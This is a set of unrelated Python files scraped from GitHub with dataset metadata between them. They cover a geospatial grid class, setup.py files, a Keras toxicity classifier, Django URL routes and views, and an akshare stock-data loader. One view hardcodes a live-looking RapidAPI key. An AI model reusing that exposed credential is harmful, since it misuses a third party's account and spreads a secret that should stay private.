Get the tag (or id) of a polygon based on its location within the grid
:param i: Column number within the grid
Integer
:param j: Row number within the grid
Integer
:return: Tag
String
'''
ij = str(j * self.n_cols + i)
return self.tag_prefix + '0' * (len(str(self.n_cols * self.n_rows)) - len(ij)) + ij
def tag_from_xy(self, x, y):
'''
Get the tag (or id) of a polygon based on a pair of coordinates located within it
:param x: Coordinate in the horizontal axis
Float
:param y: Coordinate in the vertical axis
Float
:return: Tag
String
'''
nx = self.get_col(x)
ny = self.get_row(y)
if nx is not None and ny is not None:
return self.tag_from_ij(nx, ny)
def ij_from_tag(self, tag):
'''
Get the location of a polygon within the grid based on its tag (or id)
:param tag: id of a polygon
String
:return: Location (i, j) of a polygon
Tuple of integers
'''
ix = self.tags.index(tag)
ny = ix // self.n_cols
nx = ix % self.n_cols
return nx, ny
def add_polygon_from_tag(self, tag):
'''
Incorporate a polygon to the sparse_grid GeoDataFrame
:param tag: id of a polygon
String
'''
if tag not in self.sparse_frame.id.tolist():
nx, ny = self.ij_from_tag(tag)
x0 = self.x_lim[0] + nx * self.dx
y0 = self.y_lim[0] + ny * self.dy
sq = [(x0, y0), (x0, y0 + self.dy), (x0 + self.dx, y0 + self.dy), (x0 + self.dx, y0)]
ngeo = geopandas.GeoDataFrame({'id': [tag],
'geometry': shapely.geometry.Polygon(sq)})
self.sparse_frame = self.sparse_frame.append(ngeo)
self.sparse_frame.reset_index(inplace=True, drop=True)
def add_polygon_from_xy(self, X):
'''
Incorporate a polygon to the sparse_grid GeoDataFrame
:param X: Points withing the grid
Numpy array of dimensions (n, 2)
'''
assert isinstance(X, np.ndarray)
assert X.shape[1] == 2
for xi in X:
tagi = self.tag_from_xy(*xi)
self.add_polygon_from_tag(tagi)
def get_simplified(self, tolerance=1e-4):
'''
Simplify adjacent polygons in sparse_grid
:param tolerance: Points in a simplified geometry will be no more than `tolerance` distance from the original.
(see geopandas.GeoDataFrame.simplify).
float
:return: Simplified polygons object.
GeoDataFrame
'''
assert tolerance > 0
mpolyg = shapely.geometry.multipolygon.asMultiPolygon(self.sparse_frame.geometry)
mpolyg = mpolyg.simplify(tolerance=tolerance, preserve_topology=False)
return geopandas.GeoDataFrame({'id': list(range(len(mpolyg))), 'geometry': mpolyg}) | disarm-platform/disarm-gears | disarm_gears/frames/sparse_grid.py | sparse_grid.py | py | 5,682 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.diff",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.diff",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_numbe... |
14114323371 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="mktable2matrix",
version="0.1.2",
author="Guilherme Lucas",
author_email="guilherme.slucas@gmail.com",
description="Converts markdown table to Matrix",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Guilhermeslucas/mktable2matrix",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | Guilhermeslucas/mktable2matrix | setup.py | setup.py | py | 646 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 16,
"usage_type": "call"
}
] |
73895270183 | '''
Author: airscker
Date: 2022-09-21 18:43:31
LastEditors: airscker
LastEditTime: 2023-08-31 12:23:45
Description: NULL
Copyright (C) 2023 by Airscker(Yufeng), All Rights Reserved.
'''
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
import pathlib
import os
here = pathlib.Path(__file__).parent.resolve()
# Get the long description from the README file
long_description = (here / "./README.md").read_text(encoding="utf-8")
version = {}
with open(os.path.join("DeepMuon", "__version__.py")) as f:
exec(f.read(), version)
setup(
name="DeepMuon",
version=version['__version__'],
description="Interdisciplinary Deep Learning Platform",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://airscker.github.io/DeepMuon/",
author="Airscker/Yufeng Wang",
author_email="airscker@gmail.com",
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Topic :: Software Development :: Build Tools",
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
keywords="Deep Learning, Searching Dark Matter, Direct and Simple",
# When your source code is in a subdirectory under the project root, e.g.
# `src/`, it is necessary to specify the `package_dir` argument.
# package_dir={"": "DeepMuon"}, # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
# py_modules=["my_module"],
#
packages=find_packages(), # Required
# Specify which Python versions you support. In contrast to the
# 'Programming Language' classifiers above, 'pip install' will check this
# and refuse to install the project if the version does not match. See
# https://packaging.python.org/guides/distributing-packages-using-setuptools/#python-requires
python_requires=">=3.6, <4",
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/discussions/install-requires-vs-requirements/
install_requires=['click',
'prettytable',
'opencv-python',
'tqdm',
'numpy',
'pandas',
'openpyxl',
'ptflops',
'torchinfo',
'captum',
'monai',
'pynvml',
'psutil',
'GPUtil',
'matplotlib',
'timm',
'SimpleITK',
'scikit-learn',
'scikit-image',
'tensorboard',
'yapf',
'parso',
'rdkit',
'seaborn'
],
# Similar to `install_requires` above, these must be valid existing
# projects.
# extras_require={ # Optional
# "dev": ["check-manifest"],
# "test": ["coverage"],
# },
# If there are data files included in your packages that need to be
# installed, specify them here.
# package_data={ # Optional
# "sample": ["package_data.dat"],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[("Tutorial", ["Tutorial/*"],'Resources',['Resources/*'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
entry_points={ # Optional
"console_scripts": [
"Dmuon_train=DeepMuon.train.run:main",
# "Dmuon_infer=DeepMuon.test.inference:run",
# 'Dmuon_ana=DeepMuon.test.analysis:run',
# 'Dmuon_com=DeepMuon.test.compare:run',
],
},
# List additional URLs that are relevant to your project as a dict.
#
# This field corresponds to the "Project-URL" metadata fields:
# https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use
#
# Examples listed include a pattern for specifying where the package tracks
# issues, where the source is hosted, where to say thanks to the package
# maintainers, and where to support the project financially. The key is
# what's used to render the link text on PyPI.
# project_urls={ # Optional
# "Bug Reports": "https://github.com/pypa/sampleproject/issues",
# "Funding": "https://donate.pypi.org",
# "Say Thanks!": "http://saythanks.io/to/example",
# "Source": "https://github.com/pypa/sampleproject/",
# },
)
| Airscker/DeepMuon | setup.py | setup.py | py | 6,250 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "setuptools.setup",
"line_n... |
25597505663 | # Basic packages
import pandas as pd
import numpy as np
import re
import collections
# import matplotlib.pyplot as plt
from pathlib import Path
# Packages for data preparation
from sklearn.model_selection import train_test_split
from nltk.corpus import stopwords
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils.np_utils import to_categorical
from sklearn.preprocessing import LabelEncoder
# Packages for modeling
from keras import models
from keras import layers
from keras import regularizers
NB_WORDS = 10000 # Parameter indicating the number of words we'll put in the dictionary
VAL_SIZE = 1000 # Size of the validation set
NB_START_EPOCHS = 20 # Number of epochs we usually start to train with
BATCH_SIZE = 512 # Size of the batches used in the mini-batch gradient descent
MAX_LEN = 24 # Maximum number of words in a sequence
GLOVE_DIM = 50 # Number of dimensions of the GloVe word embeddings
INPUT_PATH = '../input' # Path where all input files are stored
root = Path('./')
input_path = root / 'input/'
ouput_path = root / 'output/'
source_path = root / 'source/'
def deep_model(model, X_train, y_train, X_valid, y_valid):
'''
Function to train a multi-class model. The number of epochs and
batch_size are set by the constants at the top of the
notebook.
Parameters:
model : model with the chosen architecture
X_train : training features
y_train : training target
X_valid : validation features
Y_valid : validation target
Output:
model training history
'''
model.compile(optimizer='rmsprop'
, loss='categorical_crossentropy'
, metrics=['accuracy'])
model.fit(X_train
, y_train
, epochs=NB_START_EPOCHS
, batch_size=BATCH_SIZE
, validation_data=(X_valid, y_valid)
, verbose=1)
model.save("./output/model/model.h5")
def eval_metric(history, metric_name):
'''
Function to evaluate a trained model on a chosen metric.
Training and validation metric are plotted in a
line chart for each epoch.
Parameters:
history : model training history
metric_name : loss or accuracy
Output:
line chart with epochs of x-axis and metric on
y-axis
'''
metric = history.history[metric_name]
val_metric = history.history['val_' + metric_name]
e = range(1, NB_START_EPOCHS + 1)
plt.plot(e, metric, 'bo', label='Train ' + metric_name)
plt.plot(e, val_metric, 'b', label='Validation ' + metric_name)
plt.legend()
plt.show()
def test_model(model, X_train, y_train, X_test, y_test, epoch_stop):
'''
Function to test the model on new data after training it
on the full training data with the optimal number of epochs.
Parameters:
model : trained model
X_train : training features
y_train : training target
X_test : test features
y_test : test target
epochs : optimal number of epochs
Output:
test accuracy and test loss
'''
model.fit(X_train
, y_train
, epochs=epoch_stop
, batch_size=BATCH_SIZE
, verbose=0)
results = model.evaluate(X_test, y_test)
return results
def remove_stopwords(input_text):
'''
Function to remove English stopwords from a Pandas Series.
Parameters:
input_text : text to clean
Output:
cleaned Pandas Series
'''
stopwords_list = stopwords.words('english')
# Some words which might indicate a certain sentiment are kept via a whitelist
whitelist = ["n't", "not", "no"]
words = input_text.split()
clean_words = [word for word in words if (word not in stopwords_list or word in whitelist) and len(word) > 1]
return " ".join(clean_words)
def remove_mentions(input_text):
'''
Function to remove mentions, preceded by @, in a Pandas Series
Parameters:
input_text : text to clean
Output:
cleaned Pandas Series
'''
return re.sub(r'@\w+', '', input_text)
df = pd.read_csv(input_path / 'train.csv')
df = df.reindex(np.random.permutation(df.index))
df = df[['comment_text', 'toxic']]
df.text = df.comment_text.apply(remove_stopwords).apply(remove_mentions)
X_train, X_test, y_train, y_test = train_test_split(df.comment_text, df.toxic, test_size=0.1, random_state=37)
print('# Train data samples:', X_train.shape[0])
print('# Test data samples:', X_test.shape[0])
assert X_train.shape[0] == y_train.shape[0]
assert X_test.shape[0] == y_test.shape[0]
tk = Tokenizer(num_words=NB_WORDS,
filters='!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n',
lower=True,
split=" ")
tk.fit_on_texts(X_train)
X_train_seq = tk.texts_to_sequences(X_train)
X_test_seq = tk.texts_to_sequences(X_test)
seq_lengths = X_train.apply(lambda x: len(x.split(' ')))
seq_lengths.describe()
X_train_seq_trunc = pad_sequences(X_train_seq, maxlen=MAX_LEN)
X_test_seq_trunc = pad_sequences(X_test_seq, maxlen=MAX_LEN)
X_train_seq_trunc[10] # Example of padded sequence
le = LabelEncoder()
y_train_le = le.fit_transform(y_train)
y_test_le = le.transform(y_test)
y_train_oh = to_categorical(y_train_le)
y_test_oh = to_categorical(y_test_le)
X_train_emb, X_valid_emb, y_train_emb, y_valid_emb = train_test_split(X_train_seq_trunc, y_train_oh, test_size=0.1, random_state=37)
assert X_valid_emb.shape[0] == y_valid_emb.shape[0]
assert X_train_emb.shape[0] == y_train_emb.shape[0]
print('Shape of validation set:',X_valid_emb.shape)
glove_file = 'glove.twitter.27B.25d.txt'
glove_dir = 'glove/'
emb_dict = {}
glove = open(input_path / glove_dir / glove_file)
for line in glove:
values = line.split()
word = values[0]
vector = np.asarray(values[1:], dtype='float32')
emb_dict[word] = vector
glove.close()
airline_words = ['fuck', 'pussy', 'sad', 'hell']
for w in airline_words:
if w in emb_dict.keys():
print('Found the word {} in the dictionary'.format(w))
GLOVE_DIM = 25
emb_matrix = np.zeros((NB_WORDS, GLOVE_DIM))
for w, i in tk.word_index.items():
# The word_index contains a token for all words of the training data so we need to limit that
if i < NB_WORDS:
vect = emb_dict.get(w)
# Check if the word from the training data occurs in the GloVe word embeddings
# Otherwise the vector is kept with only zeros
if vect is not None:
emb_matrix[i] = vect
else:
break
from keras.layers import LSTM
lstm_out = 20
emb_model2 = models.Sequential()
emb_model2.add(layers.Embedding(NB_WORDS, GLOVE_DIM, input_length=MAX_LEN))
emb_model2.add(LSTM(lstm_out, dropout=0.2, recurrent_dropout=0.2))
emb_model2.add(layers.Dense(2, activation='softmax'))
emb_model2.summary()
emb_history2 = deep_model(emb_model2, X_train_emb, y_train_emb, X_valid_emb, y_valid_emb)
# embmodel.save("./lstm_model/model.h5")
# eval_metric(emb_history2, 'loss')
# eval_metric(emb_history2, 'acc')
emb_results2 = test_model(emb_model2, X_train_seq_trunc, y_train_oh, X_test_seq_trunc, y_test_oh, 3)
print('/n')
print('Test accuracy of word embedding model 2: {0:.2f}%'.format(emb_results2[1]*100))
twt = ["vagina"]
#vectorizing the tweet by the pre-fitted tokenizer instance
twt = tk.texts_to_sequences(twt)
#padding the tweet to have exactly the same shape as `embedding_2` input
twt = pad_sequences(twt, maxlen=24, dtype='int32', value=0)
print(twt)
sentiment = emb_model2.predict(twt,batch_size=1,verbose = 2)[0]
if(np.argmax(sentiment) == 0):
print("positive")
elif (np.argmax(sentiment) == 1):
print("negative")
| ntesh21/profanity-detection | train.py | train.py | py | 7,843 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords",
"line_number": 127,
"usage_type": "name"
},
{
"api_name": "re.s... |
35689287977 | from utils.database import db
from utils.database import Product as ProductDB, ProductSize as ProductSizes, ProductColor as ProductColors, SubCategories as SubCategoriesDB, Categories as CategoriesDB
def get_products(id:int=None, search_string:str=None, category_item:str=None, subcategory_item:str=None) -> list:
products = []
if id is None:
# Get all products from db
for product in db.session.query(ProductDB).all():
subcategory = db.session.query(SubCategoriesDB).get(product.subcategory_id)
subcategory_name = subcategory.name
category = db.session.query(CategoriesDB).get(subcategory.category_id)
category_name = category.name
product_info = {'id': product.id,
'name': product.name,
'image': product.image,
'description': product.description,
'category_name': category_name,
'subcategory_name': subcategory_name}
products.append(product_info)
# Filter products for search action
if search_string:
if len(products):
filterd_products = [product for product in products
if search_string.lower() in product["name"].lower()
or search_string.lower() in product["category_name"].lower()
or search_string.lower() in product["subcategory_name"].lower()]
products = filterd_products
# If go by category, filter category & subcategory
if subcategory_item and not search_string:
if len(products):
filterd_products = list(filter(lambda product : True
if product['subcategory_name'] == subcategory_item
and product['category_name'] == category_item
else False, products))
products = filterd_products
else:
product = db.session.query(ProductDB).get(id)
sizes = product.sizes
colors = product.colors
product_info = {'id': product.id,
'name': product.name,
'image': product.image,
'description': product.description,
'stocks': product.stocks,
'price': product.price,
'material': product.material,
'composition': product.composition,
'care': product.care,
'exchange': product.exchange,
'country': product.country,
'sizes': [size.size for size in sizes],
'colors': [color.color for color in colors]}
products.append(product_info)
return products
def add_products(products):
try:
# Add to main product
for product in products:
# Add main product
new_product = ProductDB(name=product['name'],
image=product['image'],
description=product['description'],
stocks=product['stocks'],
price=product['price'],
material=product['material'],
composition=product['composition'],
care=product['care'],
exchange=product['exchange'],
country=product['country'],
subcategory_id=product['subcategory_id'])
# Add size
sizes = [ProductSizes(size=size) for size in product['sizes']]
new_product.sizes.extend(sizes)
# Add color
colors = [ProductColors(color=color) for color in product['colors']]
new_product.colors.extend(colors)
db.session.add(new_product)
db.session.commit()
except Exception as e:
print(e)
return False
finally:
db.session.close()
return True
def delete_products(product_ids:list, is_delete_all:bool=False):
if not is_delete_all:
if not len(product_ids): return False
products = db.session.query(ProductDB).filter(ProductDB.id.in_(product_ids)).all()
try:
for product in products:
ProductSizes.query.filter(ProductSizes.product_id == product.id).delete()
ProductColors.query.filter(ProductColors.product_id == product.id).delete()
db.session.delete(product)
db.session.commit()
except Exception as e:
print(e)
return False
finally:
db.session.close()
else:
try:
ProductSizes.query.delete()
ProductColors.query.delete()
counts = db.session.query(ProductDB).delete()
db.session.commit()
print(f'Deleted {counts} entries.')
except Exception as e:
print(e)
return False
finally:
db.session.close()
return True | holajoyceciao/MCloset | mystoreapp/py_files/models/product.py | product.py | py | 5,389 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.database.db.session.query",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "utils.database.Product",
"line_number": 9,
"usage_type": "argument"
},
{
"api_name": "utils.database.db.session",
"line_number": 9,
"usage_type": "attribute"
},
{... |
73274037545 | from django.urls import re_path
from . import views
urlpatterns = [
# Marketing TL
# My tasks
# re_path(r'^$', views.index),
re_path(r'^marketingTL_dashboard$', views.marketingTL_dash, name="marketingTL_dashboard"),
re_path(r'^mytasks$', views.marketingTL_mytasks, name="marketingTL_mytasks"),
re_path(r'^products$', views.marketingTL_products, name="marketingTL_products"),
re_path(r'^product_details$', views.marketingTL_productdet, name="marketingTL_productdet"),
re_path(r'^recruitments$', views.marketingTL_recruitments, name="marketingTL_recruitments"),
re_path(r'^recruitment_details$', views.marketingTL_recdet, name="marketingTL_recdet"),
# Shared tasks
re_path(r'^sharedtasks$', views.marketingTL_sharedtasks, name="marketingTL_sharedtasks"),
re_path(r'^shared_products$', views.marketingTL_sharedproducts, name="marketingTL_sharedproducts"),
re_path(r'^shared_productdetails$', views.marketingTL_Sproductdet, name="marketingTL_Sproductdet"),
re_path(r'^view_productdata', views.marketingTL_productdata, name="marketingTL_productdata"),
re_path(r'^shared_recruitments$', views.marketingTL_sharedrecruitments, name="marketingTL_sharedrecruitments"),
re_path(r'^shared_recruitmentdetails$', views.marketingTL_Srecdet, name="marketingTL_Srecdet"),
re_path(r'^view_recruitmentdata', views.marketingTL_recdata, name="marketingTL_recdata"),
# Reports
re_path(r'^report_issue$', views.marketingTL_reportissue, name="marketingTL_reportissue"),
re_path(r'^reported_issues$', views.marketingTL_reportedissues, name="marketingTL_reportedissues"),
re_path(r'^view_reportedissue$', views.marketingTL_viewissue, name="marketingTL_viewissue"),
# Attendance
re_path(r'^give_attendance$', views.marketingTL_giveattendance, name="marketingTL_giveattendance"),
re_path(r'^view_attendance$', views.marketingTL_viewattendance, name="marketingTL_viewattendance"),
re_path(r'^show_attendance$', views.marketingTL_showattendance, name="marketingTL_showattendance"),
# Data Collector
re_path(r'^dc_dash$', views.dc_dash, name="dc_dash"),
# Tasks
re_path(r'^dc_mytasks$', views.dc_mytasks, name="dc_mytasks"),
re_path(r'^dc_products$', views.dc_products, name="dc_products"),
re_path(r'^dc_productdet$', views.dc_productdet, name="dc_productdet"),
re_path(r'^collect_productdata$', views.collect_productdata, name="collect_productdata"),
re_path(r'^dc_recruitments$', views.dc_recruitments, name="dc_recruitments"),
re_path(r'^dc_recdet$', views.dc_recdet, name="dc_recdet"),
re_path(r'^collect_recdata$', views.collect_recdata, name="collect_recdata"),
# Reports
re_path(r'^dc_reportissue$', views.dc_reportissue, name="dc_reportissue"),
re_path(r'^dc_reportedissues$', views.dc_reportedissues, name="dc_reportedissues"),
re_path(r'^dc_viewissue$', views.dc_viewissue, name="dc_viewissue"),
#Attendance
re_path(r'^dc_viewattendance$', views.dc_viewattendance, name="dc_viewattendance"),
re_path(r'^dc_showattendance$', views.dc_showattendance, name="dc_showattendance"),
# Marketing Executive
re_path(r'^exec_dash$', views.exec_dash, name="exec_dash"),
# Tasks
re_path(r'^exec_mytasks$', views.exec_mytasks, name="exec_mytasks"),
re_path(r'^exec_products$', views.exec_products, name="exec_products"),
re_path(r'^exec_productdet$', views.exec_productdet, name="exec_productdet"),
re_path(r'^exec_productdata$', views.exec_productdata, name="exec_productdata"),
re_path(r'^exec_recruitments$', views.exec_recruitments, name="exec_recruitments"),
re_path(r'^exec_recdet$', views.exec_recdet, name="exec_recdet"),
re_path(r'^exec_recdata$', views.exec_recdata, name="exec_recdata"),
# Reports
re_path(r'^exec_reportissue$', views.exec_reportissue, name="exec_reportissue"),
re_path(r'^exec_reportedissues$', views.exec_reportedissues, name="exec_reportedissues"),
re_path(r'^exec_viewissue$', views.exec_viewissue, name="exec_viewissue"),
#Attendance
re_path(r'^exec_viewattendance$', views.exec_viewattendance, name="exec_viewattendance"),
re_path(r'^exec_showattendance$', views.exec_showattendance, name="exec_showattendance"),
]
| Emil-20/infoxmain | marketingapp/urls.py | urls.py | py | 4,392 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "django.urls.re_path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "django.urls.re_path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.urls.re_path",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "django.ur... |
41911943994 | from django.shortcuts import render
from .forms import *
from django.http import HttpResponse
import requests
def index(request):
#Making try-except block for excluding KeyError
#This is made because in post request may be field which API cannot work with
try:
#accepting POST request
film_title = request.POST.get('message', '')
#when POST has been made, the webpage changes
if request.method == 'POST':
film_title1 = str(film_title)
url = "https://imdb8.p.rapidapi.com/auto-complete"
querystring = {"q": film_title1}
headers = {
"X-RapidAPI-Key": "62008096b2mshfb208128fa454d7p14c074jsne7881457ef9a",
"X-RapidAPI-Host": "imdb8.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=querystring)
#accepting all information from API
title = response.json()["d"][0]["l"]
image_url = response.json()["d"][0]["i"]["imageUrl"]
year = response.json()["d"][0]["y"]
cast = response.json()["d"][0]["s"]
title1 = response.json()["d"][1]["l"]
image_url1 = response.json()["d"][1]["i"]["imageUrl"]
year1 = response.json()["d"][1]["y"]
cast1 = response.json()["d"][1]["s"]
title2 = response.json()["d"][2]["l"]
image_url2 = response.json()["d"][2]["i"]["imageUrl"]
year2 = response.json()["d"][2]["y"]
cast2 = response.json()["d"][2]["s"]
title = title.replace('\'', '')
cast = cast.replace('\'', '')
year = str(year)
title1 = title1.replace('\'', '')
cast1 = cast1.replace('\'', '')
year1 = str(year1)
title2 = title2.replace('\'', '')
cast2 = cast2.replace('\'', '')
year2 = str(year2)
#the variable which gives info to HTML page
context = {
'title': title,
"image_url": image_url,
"year": year,
"cast": cast,
'title1': title1,
"image_url1": image_url1,
"year1": year1,
"cast1": cast1,
'title2': title2,
"image_url2": image_url2,
"year2": year2,
"cast2": cast2,
#The 2 variables below create the if statement in html page,
#Which allow the webpage to show certain information in certain conditions
'is_post_request': True,
'errors': False
}
return render(request, 'main/index.html', context)
#when POST has not been made. Basically, the first page
return render(request, 'main/index.html', {'is_post_request': False, 'no_errors': False})
except (KeyError, IndexError):
return render(request, 'main/index.html', {'is_post_request': False, 'no_errors': True})
| adilluos/Movie-Searcher | WebProject/taskmanager/main/views.py | views.py | py | 3,026 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.request",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "djan... |
70606654505 | import multiprocessing
import os
import sys
import time
import warnings
from datetime import date
import akshare as ak
import numpy as np
import pandas as pd
warnings.filterwarnings("ignore")
# 输出显示设置
pd.set_option('max_rows', None)
pd.set_option('max_columns', None)
pd.set_option('expand_frame_repr', False)
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
# 在linux会识别不了包 所以要加临时搜索目录
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(rootPath)
from util.DBUtils import sqlalchemyUtil
from util.CommonUtils import get_process_num, get_code_group, get_code_list
# 这接口太脆了 不能开太多进程
def multiprocess_run(code_list, start_date, engine, process_num = 2):
code_group = get_code_group(process_num, code_list)
result_list = []
with multiprocessing.Pool(processes=process_num) as pool:
# 多进程异步计算
for i in range(len(code_group)):
codes = code_group[i]
# 传递给apply_async()的函数如果有参数,需要以元组的形式传递 并在最后一个参数后面加上 , 号,如果没有加, 号,提交到进程池的任务也是不会执行的
result_list.append(pool.apply_async(get_group_data, args=(codes, start_date, i, len(code_group), len(code_list),)))
# 阻止后续任务提交到进程池
pool.close()
# 等待所有进程结束
pool.join()
# delete_sql = '''truncate table ods_financial_analysis_indicator_di;'''
# engine.execute(delete_sql)
for r in result_list:
rl = r.get()
if rl:
# 写入mysql append replace
# 重复主键不插入
engine.execute(
"""
insert ignore into ods_financial_analysis_indicator_di (announcement_date, stock_code, stock_name, ps_business_cash_flow,
return_on_equity, npadnrgal, net_profit_growth_rate)
values (%s, %s, %s, %s, %s, %s, %s);
""", rl
)
else:
print('rl为空')
print('ods_financial_analysis_indicator_di:执行完毕!!!')
def get_group_data(code_list, start_date, i, n, total):
result_list = []
for codes in code_list:
ak_code = codes[0]
ak_name = codes[1]
# print('ods_financial_analysis_indicator_di:{}启动,父进程为{}:第{}组/共{}组,{}个)正在处理{}...'.format(os.getpid(), os.getppid(), i, n, total, ak_name))
df = get_data(ak_code, ak_name,start_date)
if df.empty:
continue
result_list.extend(np.array(df).tolist())
return result_list
def get_data(ak_code, ak_name,start_date):
# time.sleep(1)
for i in range(1):
try:
# print(ak_code, ak_name)
# 新浪财经-财务分析-财务指标
df = ak.stock_financial_analysis_indicator(symbol=ak_code)
if df.empty:
continue
df = df[pd.to_datetime(df['日期']) >= pd.to_datetime(start_date)]
# df = df[pd.to_datetime(df['日期']) >= pd.to_datetime('20210101')]
if ak_code.startswith('6'):
df['stock_code'] = 'sh' + ak_code
elif ak_code.startswith('8') or ak_code.startswith('4') == True:
df['stock_code'] = 'bj' + ak_code
else:
df['stock_code'] = 'sz' + ak_code
df['stock_name'] = ak_name
df.rename(columns={'日期':'announcement_date','每股经营性现金流(元)':'ps_business_cash_flow','净资产收益率(%)':'return_on_equity','扣除非经常性损益后的净利润(元)':'npadnrgal','净利润增长率(%)':'net_profit_growth_rate'}, inplace=True)
df = df[['announcement_date','stock_code','stock_name','ps_business_cash_flow','return_on_equity','npadnrgal','net_profit_growth_rate']]
# MySQL无法处理nan
df = df.replace({np.nan: None})
return df
except Exception as e:
print(e)
return pd.DataFrame
# nohup python ods_financial_analysis_indicator_di.py update 20221010 >> my.log 2>&1 &
# 这个全量很慢 平时不能全量 要取最新日期
if __name__ == '__main__':
code_list = get_code_list()
start_date = date.today().strftime('%Y%m%d')
end_date = start_date
if len(sys.argv) == 1:
print("请携带一个参数 all update 更新要输入开启日期 结束日期 不输入则默认当天")
elif len(sys.argv) == 2:
run_type = sys.argv[1]
if run_type == 'all':
start_date = '20210101'
else:
start_date = date.today().strftime('%Y%m%d')
elif len(sys.argv) == 4:
run_type = sys.argv[1]
start_date = sys.argv[2]
engine = sqlalchemyUtil().engine
start_time = time.time()
multiprocess_run(code_list, start_date, engine)
engine.dispose()
end_time = time.time()
print('程序运行时间:{}s,{}分钟'.format(end_time - start_time, (end_time - start_time) / 60)) | cgyPension/pythonstudy_space | 05_quantitative_trading_mysql/ods/ods_financial_analysis_indicator_di.py | ods_financial_analysis_indicator_di.py | py | 5,216 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.set_option",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pandas.set_option",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pandas.se... |
10507399118 | import argparse
import sys
import json
import pickle
import os
import time
status_colors_hex = {
'200': '#6FB665',
'204': '#4FA29F',
'400': '#D8C726',
'404': '#F06A2A',
'406': '#78CAEF',
'414': '#86F6D2',
'500': '#043E8A',
'502': '#A81E03',
}
def fetch_input(stats_file):
file_resource = file(stats_file, 'r')
data = []
for line in file_resource:
keys = ['count', 'code']; vals = line.strip().split()
data.append(dict(zip(keys, vals)))
file_resource.close()
return data
def unpack_data(rows):
"""
Input:
[('2014-12-10', [{'count': '7', 'code': '200'}, {'count': '3', 'code': '204'}]),
('2014-12-11', [{'count': '9', 'code': '200'}, {'count': '1', 'code': '204'}]),
('2014-12-13', [{'count': '3', 'code': '200'}, {'count': '2', 'code': '204'}])]
Ouput Example:
categories = ['200', '201', '204']
series = [
{"color": "#108ec5", "name": "NewYork", "data": [17.0,22.0,24.8,24.1,20.1,14.1,8.6,2.5]},
{"color": "#52b238", "name": "Berlin", "data": [13.5,17.0,18.6,17.9,14.3,9.0,3.9,1.0]},
{"color": "#ee5728", "name": "London", "data": [11.9,15.2,17.0,16.6,14.2,10.3,6.6,4.8]}
]
"""
categories = []
series = []
status_codes = {}
for date, codes in sorted(rows): # stored data can be appended in any order..
categories.append(date)
for entry in codes:
code = entry['code']
count = int(entry['count'])
if code in status_codes:
status_codes[code].append(count)
else:
status_codes[code] = [count]
for key, value in status_codes.items():
color = status_colors_hex.get(key, '#fff')
serie = {"color": color, "name": "http %s" % key, "data": value}
series.append(serie)
# limit output for graph to last 23 points.
# this geckoboard stupidity..
return {'categories': categories, 'series': series}
